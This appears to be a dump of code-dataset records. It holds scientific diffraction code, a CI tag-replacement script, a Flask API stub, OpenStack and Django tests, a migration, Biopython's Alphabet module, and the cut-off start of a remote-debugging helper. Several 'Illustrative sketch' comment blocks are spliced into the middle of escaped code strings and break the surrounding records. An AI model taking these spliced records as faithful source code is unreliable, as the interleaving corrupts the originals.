self._omeEdges[-1]) <= ct.sqrt_epsf:\n # !!! 
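# --- Illustrative sketch: dict <-> HDF5 round trip ---------------------------
# A usage example for the two helpers above, assumed to run in the same module
# so unwrap_dict_to_h5/unwrap_h5_to_dict are in scope.  The in-memory 'core'
# driver avoids touching disk; the file name and payload are hypothetical.
# Note that unwrap_dict_to_h5 consumes (pops) the dict it is given.
import h5py
import numpy as np

with h5py.File('sketch.h5', 'w', driver='core', backing_store=False) as f:
    unwrap_dict_to_h5(
        f, {'beam': {'energy': 65.0}, 'tilt': np.r_[0., 0., 0.1]}
    )
    recovered = {}
    unwrap_h5_to_dict(f, recovered)

print(recovered)   # nested dict restored: {'beam': {'energy': ...}, 'tilt': ...}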
SIGNED delta ome\n del_ome = np.radians(omegas_array[0, 1] - omegas_array[0, 0])\n self._omeEdges[-1] = self._omeEdges[-2] + del_ome\n\n # handle etas\n # WARNING: unlinke the omegas in imageseries metadata,\n # these are in RADIANS and represent bin centers\n self._etaEdges = etas\n self._etas = self._etaEdges[:-1] + 0.5*np.radians(eta_step)\n\n @property\n def dataStore(self):\n return self._dataStore\n\n @property\n def planeData(self):\n return self._planeData\n\n @property\n def iHKLList(self):\n return np.atleast_1d(self._iHKLList).flatten()\n\n @property\n def etaEdges(self):\n return self._etaEdges\n\n @property\n def omeEdges(self):\n return self._omeEdges\n\n @property\n def etas(self):\n return self._etas\n\n @property\n def omegas(self):\n return self._omegas\n\n def save(self, filename):\n xrdutil.EtaOmeMaps.save_eta_ome_maps(self, filename)\n pass # end of class: GenerateEtaOmeMaps\n\n\ndef _row_edge_vec(rows, pixel_size_row):\n return pixel_size_row*(0.5*rows-np.arange(rows+1))\n\n\ndef _col_edge_vec(cols, pixel_size_col):\n return pixel_size_col*(np.arange(cols+1)-0.5*cols)\n\n\ndef _generate_pixel_solid_angles(start_stop, rows, cols, pixel_size_row,\n pixel_size_col, rmat, tvec):\n start, stop = start_stop\n row_edge_vec = _row_edge_vec(rows, pixel_size_row)\n col_edge_vec = _col_edge_vec(cols, pixel_size_col)\n\n nvtx = len(row_edge_vec) * len(col_edge_vec)\n # pixel vertex coords\n pvy, pvx = np.meshgrid(row_edge_vec, col_edge_vec, indexing='ij')\n\n # add Z_d coord and transform to lab frame\n pcrd_array_full = np.dot(\n np.vstack([pvx.flatten(), pvy.flatten(), np.zeros(nvtx)]).T,\n rmat.T\n ) + tvec\n\n conn = cellConnectivity(rows, cols)\n\n ret = np.empty(len(range(start, stop)), dtype=float)\n\n for i, ipix in enumerate(range(start, stop)):\n pix_conn = conn[ipix]\n vtx_list = pcrd_array_full[pix_conn, :]\n ret[i] = (_solid_angle_of_triangle(vtx_list[[0, 1, 2], :]) +\n _solid_angle_of_triangle(vtx_list[[2, 3, 0], :]))\n\n return ret\n\n\n@memoize\ndef _pixel_angles(origin, pixel_coords, distortion, rmat, tvec, bvec, evec,\n rows, cols):\n assert len(origin) == 3, \"origin must have 3 elements\"\n\n pix_i, pix_j = pixel_coords\n xy = np.ascontiguousarray(\n np.vstack([\n pix_j.flatten(), pix_i.flatten()\n ]).T\n )\n\n if distortion is not None:\n xy = distortion.apply(xy)\n\n angs, g_vec = detectorXYToGvec(\n xy, rmat, ct.identity_3x3,\n tvec, ct.zeros_3, origin,\n beamVec=bvec, etaVec=evec)\n\n tth = angs[0].reshape(rows, cols)\n eta = angs[1].reshape(rows, cols)\n return tth, eta\n\n\n@memoize\ndef _pixel_solid_angles(rows, cols, pixel_size_row, pixel_size_col,\n rmat, tvec, max_workers):\n # connectivity array for pixels\n conn = cellConnectivity(rows, cols)\n\n # result\n solid_angs = np.empty(len(conn), dtype=float)\n\n # Distribute tasks to each process\n tasks = distribute_tasks(len(conn), max_workers)\n kwargs = {\n 'rows': rows,\n 'cols': cols,\n 'pixel_size_row': pixel_size_row,\n 'pixel_size_col': pixel_size_col,\n 'rmat': rmat,\n 'tvec': tvec,\n }\n func = partial(_generate_pixel_solid_angles, **kwargs)\n with ProcessPoolExecutor(max_workers=max_workers) as executor:\n results = executor.map(func, tasks)\n\n # Concatenate all the results together\n solid_angs[:] = np.concatenate(list(results))\n solid_angs = solid_angs.reshape(rows, cols)\n mi = solid_angs.min()\n if mi > 0.:\n solid_angs = solid_angs/mi\n\n return solid_angs\n\n\n@memoize\ndef _lorentz_polarization_factor(tth, eta, f_hor, f_vert):\n \"\"\"\n 06/14/2021 SS adding lorentz polarization 
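# --- Illustrative sketch: edge vectors bracket the center vectors ------------
# _row_edge_vec/_col_edge_vec above return rows+1 (cols+1) pixel EDGE
# coordinates; midpoints of consecutive edges reproduce the pixel-CENTER
# vectors used on the panel.  A tiny hypothetical panel shows the relation.
import numpy as np

rows, cols, psr, psc = 3, 2, 0.2, 0.2    # hypothetical panel

row_edges = psr * (0.5 * rows - np.arange(rows + 1))
col_edges = psc * (np.arange(cols + 1) - 0.5 * cols)

row_centers = 0.5 * (row_edges[:-1] + row_edges[1:])
col_centers = 0.5 * (col_edges[:-1] + col_edges[1:])

print(row_edges)      # [ 0.3  0.1 -0.1 -0.3]
print(row_centers)    # [ 0.2  0.  -0.2] == psr*(0.5*(rows-1) - arange(rows))
print(col_centers)    # [-0.1  0.1]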
factor computation\n to the detector so that it can be compenstated for in the\n intensity correction\n\n parameters: tth two theta of every pixel in radians\n eta azimuthal angle of every pixel\n f_hor fraction of horizontal polarization\n (~1 for XFELs)\n f_vert fraction of vertical polarization\n (~0 for XFELs)\n notice f_hor + f_vert = 1\n \"\"\"\n\n theta = 0.5*tth\n\n cth = np.cos(theta)\n sth2 = np.sin(theta)**2\n\n ctth2 = np.cos(tth)**2\n seta2 = np.sin(eta)**2\n ceta2 = np.cos(eta)**2\n\n L = 1./(cth*sth2)\n P = f_hor*(seta2 + ceta2*ctth2) + f_vert*(ceta2 + seta2*ctth2)\n\n return L*P\n\n\ndef _generate_ring_params(tthr, ptth, peta, eta_edges, delta_eta):\n # mark pixels in the spec'd tth range\n pixels_in_tthr = np.logical_and(\n ptth >= tthr[0], ptth <= tthr[1]\n )\n\n # catch case where ring isn't on detector\n if not np.any(pixels_in_tthr):\n return None\n\n # ???: faster to index with bool or use np.where,\n # or recode in numba?\n rtth_idx = np.where(pixels_in_tthr)\n\n # grab relevant eta coords using histogram\n # !!!: This allows use to calculate arc length and\n # detect a branch cut. The histogram idx var\n # is the left-hand edges...\n retas = peta[rtth_idx]\n if fast_histogram:\n reta_hist = histogram1d(\n retas,\n len(eta_edges) - 1,\n (eta_edges[0], eta_edges[-1])\n )\n else:\n reta_hist, _ = histogram1d(retas, bins=eta_edges)\n reta_idx = np.where(reta_hist)[0]\n reta_bin_idx = np.hstack(\n [reta_idx,\n reta_idx[-1] + 1]\n )\n\n # ring arc lenght on panel\n arc_length = angularDifference(\n eta_edges[reta_bin_idx[0]],\n eta_edges[reta_bin_idx[-1]]\n )\n\n # Munge eta bins\n # !!! need to work with the subset to preserve\n # NaN values at panel extents!\n #\n # !!! MUST RE-MAP IF BRANCH CUT IS IN RANGE\n #\n # The logic below assumes that eta_edges span 2*pi to\n # single precision\n eta_bins = eta_edges[reta_bin_idx]\n if arc_length < 1e-4:\n # have branch cut in here\n ring_gap = np.where(\n reta_idx\n - np.arange(len(reta_idx))\n )[0]\n if len(ring_gap) > 0:\n # have incomplete ring\n eta_stop_idx = ring_gap[0]\n eta_stop = eta_edges[eta_stop_idx]\n new_period = np.cumsum([eta_stop, 2*np.pi])\n # remap\n retas = mapAngle(retas, new_period)\n tmp_bins = mapAngle(\n eta_edges[reta_idx], new_period\n )\n tmp_idx = np.argsort(tmp_bins)\n reta_idx = reta_idx[np.argsort(tmp_bins)]\n eta_bins = np.hstack(\n [tmp_bins[tmp_idx],\n tmp_bins[tmp_idx][-1] + delta_eta]\n )\n\n return retas, eta_bins, rtth_idx, reta_idx\n\n\ndef _run_histograms(rows, ims, tth_ranges, ring_maps, ring_params, threshold):\n for i_row in range(*rows):\n image = ims[i_row]\n\n # handle threshold if specified\n if threshold is not None:\n # !!! 
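# --- Illustrative sketch: Lorentz-polarization sanity check ------------------
# Direct check of the expression above: for an unpolarized beam
# (f_hor = f_vert = 0.5) the polarization term collapses to
# (1 + cos^2(2*theta))/2, independent of the azimuth eta.  Angles are
# hypothetical.
import numpy as np

tth = np.radians(20.0)
f_hor, f_vert = 0.5, 0.5

theta = 0.5 * tth
L = 1. / (np.cos(theta) * np.sin(theta)**2)     # Lorentz part
ctth2 = np.cos(tth)**2

for eta in np.radians([0., 45., 90.]):
    seta2, ceta2 = np.sin(eta)**2, np.cos(eta)**2
    P = f_hor*(seta2 + ceta2*ctth2) + f_vert*(ceta2 + seta2*ctth2)
    print(P, 0.5*(1. + ctth2), L*P)             # P identical for every eta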
NaNs get preserved\n image = np.array(image)\n image[image < threshold] = 0.\n\n for i_r, tthr in enumerate(tth_ranges):\n this_map = ring_maps[i_r]\n params = ring_params[i_r]\n if not params:\n # We are supposed to skip this ring...\n continue\n\n # Unpack the params\n retas, eta_bins, rtth_idx, reta_idx = params\n\n if fast_histogram:\n result = histogram1d(retas, len(eta_bins) - 1,\n (eta_bins[0], eta_bins[-1]),\n weights=image[rtth_idx])\n else:\n result, _ = histogram1d(retas, bins=eta_bins,\n weights=image[rtth_idx])\n\n this_map[i_row, reta_idx] = result\n"} {"ext": "py", "sha": "1a302845fac2f234c2c5914432911d45aee47749", "content": "#!/usr/bin/env python3\n\nimport pathlib\nimport fileinput\n\nfrom ci.util import (\n check_env,\n existing_file,\n)\n\nrepo_dir = check_env('REPO_DIR')\neffective_version = check_env('EFFECTIVE_VERSION')\n\ntemplate_file = existing_file(pathlib.Path(repo_dir, 'concourse', 'resources', 'defaults.mako'))\n\nlines_replaced = 0\nstring_to_match = 'tag = '\n\nfor line in fileinput.FileInput(str(template_file), inplace=True):\n if string_to_match in line:\n if lines_replaced != 0:\n raise RuntimeError(f'More than one image tag found in template file')\n leading_spaces = line.index(string_to_match)\n print(f'{leading_spaces * \" \"}{string_to_match}\"{effective_version}\"')\n lines_replaced = 1\n else:\n print(line, end='')\n"} {"ext": "py", "sha": "1a3028b0d17e7d9d5cf5ce08108984d51cafc917", "content": "from oslo_log import log\n\nfrom datetime import datetime\nfrom flask import request, jsonify\nfrom flask_restful import Resource, fields, marshal_with, abort\n\nfrom clapton import db\nfrom clapton.db.sqlalchemy import models\n\nfrom clapton.api import types\n\n\nLOG = log.getLogger(__name__)\n\n\nclass OrderList(Resource):\n def get(self):\n orders = db.get_session().query(models.Order).all()\n return jsonify((types.Order(many=True).dump(orders)).data), 200, {'X-Pagination-Total-Count': 1000}\n\n '''\n response = flask.make_response('[{\"id\": 123}]', 200)\n response.headers.extend({'X-Pagination-Total-Count': 1000,\n 'Content-Type': 'application/json; charset=utf-8'})\n return response\n '''\n return [{\"id\": 123}], 200, {'X-Pagination-Total-Count': 1000}\n\n def post(self):\n '''\n validate request\n parser = reqparse.RequestParser()\n parser.add_argument(\n 'total_amount',\n dest='total_amount',\n type=str,\n location='form', # form, args, headers, cookies, json, files\n required=True,\n help='The orders\\'s total amount',\n )\n args = parser.parse_args(strict=True)\n LOG.debug(args)\n LOG.debug(args.total_amount)\n return {}, 201\n '''\n data = request.get_json()\n if not data:\n return jsonify({'message': 'No imput data provided'}), 400\n data, errors = types.Order().load(data)\n if errors:\n return jsonify(errors), 422\n o = models.Order(id=data['id'])\n return jsonify((types.Order().dump(o)).data), 201\n\n\nclass Order(Resource):\n @marshal_with({'id': fields.String, 'created_at': fields.DateTime, 'links': fields.Nested({'items': fields.Url('items', absolute=True)})})\n def get(self, order_id):\n '''\n outputing format\n '''\n return {'id': 123, 'created_at': datetime.now(), 'links': []}\n\n def put(self, order_id):\n LOG.debug(request.form)\n LOG.debug(request.json)\n LOG.debug(dir(request))\n return {}, 201\n\n def delete(self, order_id):\n abort(500)\n # raise ValueError('haha')\n # raise werkzeug.exceptions.HTTPException(500)\n # raise werkzeug.exceptions.InternalServerError\n return '', 204\n\n\nclass OrderItemList(Resource):\n def get(self, 
order_id):\n return []\n"} {"ext": "py", "sha": "1a3028f71a48aad11f4b72c7d043f488cd5eb1b1", "content": "# Copyright 2019 Huawei Technologies Co.,LTD.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom unittest import mock\n\nfrom oslo_db import exception as db_exc\n\nfrom cyborg.common import exception\nfrom cyborg import objects\nfrom cyborg.tests.unit.db.base import DbTestCase\nfrom cyborg.tests.unit import fake_deployable\nfrom cyborg.tests.unit import fake_device\nfrom cyborg.tests.unit.objects import test_objects\n\n\nclass TestDeployableObject(DbTestCase):\n\n @property\n def fake_device(self):\n db_device = fake_device.get_fake_devices_as_dict()[2]\n return db_device\n\n @property\n def fake_deployable(self):\n db_deploy = fake_deployable.fake_db_deployable(id=1)\n return db_deploy\n\n @property\n def fake_deployable2(self):\n db_deploy = fake_deployable.fake_db_deployable(id=2)\n return db_deploy\n\n def test_create(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n\n self.assertEqual(db_dpl['uuid'], dpl.uuid)\n\n def test_get(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n dpl_get = objects.Deployable.get(self.context, dpl.uuid)\n self.assertEqual(dpl_get.uuid, dpl.uuid)\n\n def test_get_by_filter(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n query = {\"uuid\": dpl['uuid']}\n dpl_get_list = objects.Deployable.get_by_filter(self.context, query)\n\n self.assertEqual(dpl_get_list[0].uuid, dpl.uuid)\n\n def test_save(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get = objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n dpl.num_accelerators = 8\n dpl.save(self.context)\n dpl_get = objects.Deployable.get(self.context, dpl.uuid)\n self.assertEqual(dpl_get.num_accelerators, 8)\n\n def test_destroy(self):\n db_device = self.fake_device\n device = objects.Device(context=self.context,\n **db_device)\n device.create(self.context)\n device_get 
= objects.Device.get(self.context, device.uuid)\n db_dpl = self.fake_deployable\n dpl = objects.Deployable(context=self.context,\n **db_dpl)\n\n dpl.device_id = device_get.id\n dpl.create(self.context)\n self.assertEqual(db_dpl['uuid'], dpl.uuid)\n dpl.destroy(self.context)\n self.assertRaises(exception.ResourceNotFound,\n objects.Deployable.get, self.context,\n dpl.uuid)\n\n\nclass TestDeployableObject(test_objects._LocalTest,\n TestDeployableObject):\n def _test_save_objectfield_fk_constraint_fails(self, foreign_key,\n expected_exception):\n\n error = db_exc.DBReferenceError('table', 'constraint', foreign_key,\n 'key_table')\n # Prevent lazy-loading any fields, results in InstanceNotFound\n deployable = fake_deployable.fake_deployable_obj(self.context)\n fields_with_save_methods = [field for field in deployable.fields\n if hasattr(deployable, '_save_%s' % field)]\n for field in fields_with_save_methods:\n @mock.patch.object(deployable, '_save_%s' % field)\n @mock.patch.object(deployable, 'obj_attr_is_set')\n def _test(mock_is_set, mock_save_field):\n mock_is_set.return_value = True\n mock_save_field.side_effect = error\n deployable.obj_reset_changes(fields=[field])\n deployable._changed_fields.add(field)\n self.assertRaises(expected_exception, deployable.save)\n deployable.obj_reset_changes(fields=[field])\n _test()\n"} {"ext": "py", "sha": "1a3029291fc83c88809f1cd45425b63f1bff23cb", "content": "# from django.test import TestCase\n# from polls.models import Question,Choice\n# from django.utils import timezone\n#\n#\n# # from django.test import Client\n# # Create your tests here.\n# #用来写测试用例\n# # model测试\n# class StudyTestCsse(TestCase):\n# def setUp(self):\n# Question.objects.create(id=1,question_text=\"你的女朋友是谁?\",pub_date=timezone.now())\n#\n# def test_01(self):\n# u'''测试查询问题'''\n# question = Question.objects.get(id=1)\n# self.assertIn(\"你的女朋友是谁?\",question.question_text)\n#\n# def test_02(self):\n# u'''测试创建问题'''\n# Question.objects.create(id=2,question_text=\"今天吃什么?\",pub_date=timezone.now())\n# question = Question.objects.get(id=2)\n# self.assertIn(\"今天吃什么\",question.question_text)\n#\n# def test_03(self):\n# u'''测试更新数据'''\n# question = Question.objects.get(id=1)\n# Question.objects.filter(id=1).update(question_text=\"周末是否加班\")\n# question = Question.objects.get(id=1)\n# self.assertIn(\"周末是否加班\",question.question_text)\n#\n# def test_04(self):\n# u'''测试删除数据'''\n# question = Question.objects.get(id=1)\n# Question.objects.filter(id=1).delete()\n# self.assertEqual(0,len(Question.objects.all()))\n#\n# class choiceTestcase(TestCase):\n#\n# def setUp(self):\n# Question.objects.create(id=1,question_text=\"what's new?\",pub_date=timezone.now())\n# Choice.objects.create(id=1,choice_text='Not Much',votes=0,question_id=1)\n# Choice.objects.create(id=2,choice_text='The sky',votes=0,question_id=1)\n#\n# def test_choice_query(self):\n# u'''测试问题选项查询'''\n# choice = Choice.objects.get(id=1)\n# self.assertEqual(choice.choice_text,\"Not Much\")\n"} {"ext": "py", "sha": "1a30292bc2773def9c2a33301a689783ced66f65", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nfrom django.conf import settings\nimport model_utils.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Dataset',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, 
primary_key=True)),\n ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),\n ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),\n ('dataset', models.FileField(upload_to=b'datasets')),\n ('dimensions', models.PositiveIntegerField(default=0)),\n ('length', models.PositiveIntegerField(default=0)),\n ('filesize', models.PositiveIntegerField(default=0)),\n ('signature', models.CharField(unique=True, max_length=44, blank=True)),\n ('datatype', models.CharField(default=b'csv', max_length=4, choices=[(b'csv', b'csv'), (b'json', b'json'), (b'xml', b'xml')])),\n ('delimiter', models.CharField(default=b',', max_length=1)),\n ('uploader', models.ForeignKey(related_name='datasets', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('-created',),\n 'db_table': 'datasets',\n 'get_latest_by': 'created',\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a302982b0604d6f6f62aa08d229c33367c435e9", "content": "# Copyright 2000-2002 by Andrew Dalke.\n# Revisions copyright 2007-2008 by Peter Cock.\n# All rights reserved.\n# This code is part of the Biopython distribution and governed by its\n# license. Please see the LICENSE file that should have been included\n# as part of this package.\n\n\"\"\"Alphabets used in Seq objects etc to declare sequence type and letters.\n\nThis is used by sequences which contain a finite number of similar words.\n\"\"\"\n\nclass Alphabet:\n size = None # no fixed size for words\n letters = None # no fixed alphabet; implement as a list-like\n # interface,\n def __repr__(self):\n return self.__class__.__name__ + \"()\"\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n Returns a boolean. 
This relies on the Alphabet subclassing\n hierarchy only, and does not check the letters property.\n This isn't ideal, and doesn't seem to work as intended\n with the AlphabetEncoder classes.\"\"\"\n return isinstance(other, self.__class__)\n\n def _case_less(self):\n \"\"\"Return an case-less variant of the current alphabet (PRIVATE).\"\"\"\n #TODO - remove this method by dealing with things in subclasses?\n if isinstance(self, ProteinAlphabet):\n return generic_protein\n elif isinstance(self, DNAAlphabet):\n return generic_dna\n elif isinstance(self, NucleotideAlphabet):\n return generic_rna\n elif isinstance(self, NucleotideAlphabet):\n return generic_nucleotide\n elif isinstance(self, SingleLetterAlphabet):\n return single_letter_alphabet\n else:\n return generic_alphabet\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n if not self.letters or self.letters==self.letters.upper():\n #Easy case, no letters or already upper case!\n return self\n else:\n #TODO - Raise NotImplementedError and handle via subclass?\n return self._case_less()\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n if not self.letters or self.letters==self.letters.lower():\n #Easy case, no letters or already lower case!\n return self\n else:\n #TODO - Raise NotImplementedError and handle via subclass?\n return self._case_less()\n\ngeneric_alphabet = Alphabet()\n\nclass SingleLetterAlphabet(Alphabet):\n size = 1\n letters = None # string of all letters in the alphabet\n\nsingle_letter_alphabet = SingleLetterAlphabet()\n\n########### Protein\n\nclass ProteinAlphabet(SingleLetterAlphabet):\n pass\n\ngeneric_protein = ProteinAlphabet()\n\n########### DNA\nclass NucleotideAlphabet(SingleLetterAlphabet):\n pass\n\ngeneric_nucleotide = NucleotideAlphabet()\n\nclass DNAAlphabet(NucleotideAlphabet):\n pass\n\ngeneric_dna = DNAAlphabet()\n\n\n########### RNA\n\nclass RNAAlphabet(NucleotideAlphabet):\n pass\n\ngeneric_rna = RNAAlphabet()\n\n\n\n########### Other per-sequence encodings\n\nclass SecondaryStructure(SingleLetterAlphabet):\n letters = \"HSTC\"\n\nclass ThreeLetterProtein(Alphabet):\n size = 3\n letters = [\n \"Ala\", \"Asx\", \"Cys\", \"Asp\", \"Glu\", \"Phe\", \"Gly\", \"His\", \"Ile\",\n \"Lys\", \"Leu\", \"Met\", \"Asn\", \"Pro\", \"Gln\", \"Arg\", \"Ser\", \"Thr\",\n \"Sec\", \"Val\", \"Trp\", \"Xaa\", \"Tyr\", \"Glx\",\n ]\n \n###### Non per-sequence modifications\n\n# (These are Decorator classes)\n\nclass AlphabetEncoder:\n def __init__(self, alphabet, new_letters):\n self.alphabet = alphabet\n self.new_letters = new_letters\n if alphabet.letters is not None:\n self.letters = alphabet.letters + new_letters\n else:\n self.letters = None\n def __getattr__(self, key):\n if key[:2] == \"__\" and key[-2:] == \"__\":\n raise AttributeError(key)\n return getattr(self.alphabet, key)\n\n def __repr__(self):\n return \"%s(%r, %r)\" % (self.__class__.__name__, self.alphabet,\n self.new_letters)\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n This is isn't implemented for the base AlphabetEncoder,\n which will always return 0 (False).\"\"\"\n return 0\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n return AlphabetEncoder(self.alphabet._upper(), self.new_letters.upper())\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n return AlphabetEncoder(self.alphabet._lower(), 
self.new_letters.lower())\n\n \nclass Gapped(AlphabetEncoder):\n def __init__(self, alphabet, gap_char = \"-\"):\n AlphabetEncoder.__init__(self, alphabet, gap_char)\n self.gap_char = gap_char\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n Returns a boolean. This relies on the Alphabet subclassing\n hierarchy, and attempts to check the gap character. This fails\n if the other alphabet does not have a gap character!\n \"\"\"\n return other.gap_char == self.gap_char and \\\n self.alphabet.contains(other.alphabet)\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n return Gapped(self.alphabet._upper(), self.gap_char.upper())\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n return Gapped(self.alphabet._lower(), self.gap_char.lower())\n\n \nclass HasStopCodon(AlphabetEncoder):\n def __init__(self, alphabet, stop_symbol = \"*\"):\n AlphabetEncoder.__init__(self, alphabet, stop_symbol)\n self.stop_symbol = stop_symbol\n \n def __cmp__(self, other):\n x = cmp(self.alphabet, other.alphabet)\n if x == 0:\n return cmp(self.stop_symbol, other.stop_symbol)\n return x\n\n def contains(self, other):\n \"\"\"Does this alphabet 'contain' the other (OBSOLETE?).\n\n Returns a boolean. This relies on the Alphabet subclassing\n hierarchy, and attempts to check the stop symbol. This fails\n if the other alphabet does not have a stop symbol!\n \"\"\"\n return other.stop_symbol == self.stop_symbol and \\\n self.alphabet.contains(other.alphabet)\n\n def _upper(self):\n \"\"\"Return an upper case variant of the current alphabet (PRIVATE).\"\"\"\n return HasStopCodon(self.alphabet._upper(), self.stop_symbol.upper())\n\n def _lower(self):\n \"\"\"Return a lower case variant of the current alphabet (PRIVATE).\"\"\"\n return HasStopCodon(self.alphabet._lower(), self.stop_symbol.lower())\n\n\ndef _get_base_alphabet(alphabet):\n \"\"\"Returns the non-gapped non-stop-codon Alphabet object (PRIVATE).\"\"\"\n a = alphabet\n while isinstance(a, AlphabetEncoder):\n a = a.alphabet\n assert isinstance(a, Alphabet), \\\n \"Invalid alphabet found, %s\" % repr(a)\n return a\n\ndef _ungap(alphabet):\n \"\"\"Returns the alphabet without any gap encoder (PRIVATE).\"\"\"\n #TODO - Handle via method of the objects?\n if not hasattr(alphabet, \"gap_char\"):\n return alphabet\n elif isinstance(alphabet, Gapped):\n return alphabet.alphabet\n elif isinstance(alphabet, HasStopCodon):\n return HasStopCodon(_ungap(alphabet.alphabet), stop_symbol=alphabet.stop_symbol)\n elif isinstance(alphabet, AlphabetEncoder):\n return AlphabetEncoder(_ungap(alphabet.alphabet), letters=alphabet.letters)\n else:\n raise NotImplementedError\n \ndef _consensus_base_alphabet(alphabets):\n \"\"\"Returns a common but often generic base alphabet object (PRIVATE).\n\n This throws away any AlphabetEncoder information, e.g. Gapped alphabets.\n\n Note that DNA+RNA -> Nucleotide, and Nucleotide+Protein-> generic single\n letter. These DO NOT raise an exception!\"\"\"\n common = None\n for alpha in alphabets:\n a = _get_base_alphabet(alpha)\n if common is None:\n common = a\n elif common == a:\n pass\n elif isinstance(a, common.__class__):\n pass\n elif isinstance(common, a.__class__):\n common = a\n elif isinstance(a, NucleotideAlphabet) \\\n and isinstance(common, NucleotideAlphabet):\n #e.g. 
Give a mix of RNA and DNA alphabets\n common = generic_nucleotide\n elif isinstance(a, SingleLetterAlphabet) \\\n and isinstance(common, SingleLetterAlphabet):\n #This is a pretty big mis-match!\n common = single_letter_alphabet\n else:\n #We have a major mis-match... take the easy way out!\n return generic_alphabet\n if common is None:\n #Given NO alphabets!\n return generic_alphabet\n return common\n\ndef _consensus_alphabet(alphabets):\n \"\"\"Returns a common but often generic alphabet object (PRIVATE).\n\n Note that DNA+RNA -> Nucleotide, and Nucleotide+Protein-> generic single\n letter. These DO NOT raise an exception!\n \n This is aware of Gapped and HasStopCodon and new letters added by\n other AlphabetEncoders. This WILL raise an exception if more than\n one gap character or stop symbol is present.\"\"\"\n base = _consensus_base_alphabet(alphabets)\n gap = None\n stop = None\n new_letters = \"\"\n for alpha in alphabets:\n #Gaps...\n if not hasattr(alpha, \"gap_char\"):\n pass\n elif gap is None:\n gap = alpha.gap_char\n elif gap == alpha.gap_char:\n pass\n else:\n raise ValueError(\"More than one gap character present\")\n #Stops...\n if not hasattr(alpha, \"stop_symbol\"):\n pass\n elif stop is None:\n stop = alpha.stop_symbol\n elif stop == alpha.stop_symbol:\n pass\n else:\n raise ValueError(\"More than one stop symbol present\")\n #New letters...\n if hasattr(alpha, \"new_letters\"):\n for letter in alpha.new_letters:\n if letter not in new_letters \\\n and letter != gap and letter != stop:\n new_letters += letter\n\n alpha = base\n if new_letters:\n alpha = AlphabetEncoder(alpha, new_letters)\n if gap:\n alpha = Gapped(alpha, gap_char=gap)\n if stop:\n alpha = HasStopCodon(alpha, stop_symbol=stop)\n return alpha\n\ndef _check_type_compatible(alphabets):\n \"\"\"Returns True except for DNA+RNA or Nucleotide+Protein (PRIVATE).\n\n This relies on the Alphabet subclassing hierarchy. It does not\n check things like gap characters or stop symbols.\"\"\"\n dna, rna, nucl, protein = False, False, False, False\n for alpha in alphabets:\n a = _get_base_alphabet(alpha)\n if isinstance(a, DNAAlphabet):\n dna = True\n nucl = True\n if rna or protein : return False\n elif isinstance(a, RNAAlphabet):\n rna = True\n nucl = True\n if dna or protein : return False\n elif isinstance(a, NucleotideAlphabet):\n nucl = True\n if protein : return False\n elif isinstance(a, ProteinAlphabet):\n protein = True\n if nucl : return False\n return True\n"} {"ext": "py", "sha": "1a3029c55a3e76194405a448d8cbe490d1fa4940", "content": "\"\"\" Setup remote debugger with Python Tools for Visual Studio (PTVSD)\n\n\"\"\"\nimport os\n\nfrom .celery_log_setup import get_task_logger\n\nREMOTE_DEBUG_PORT = 3000\n\nlog = get_task_logger(__name__)\n\n\ndef setup_remote_debugging(force_enabled: bool = False, *, boot_mode=None) -> None:\n \"\"\" Programaticaly enables remote debugging if SC_BOOT_MODE==debug-ptvsd\n\n \"\"\"\n if \"SC_BOOT_MODE\" not in os.environ:\n log.warning(\"Remote debugging only available when running in a container\")\n return\n\n boot_mode = boot_mode or os.environ.get(\"SC_BOOT_MODE\")\n\n if boot_mode == \"debug-ptvsd\" or force_enabled:\n try:\n 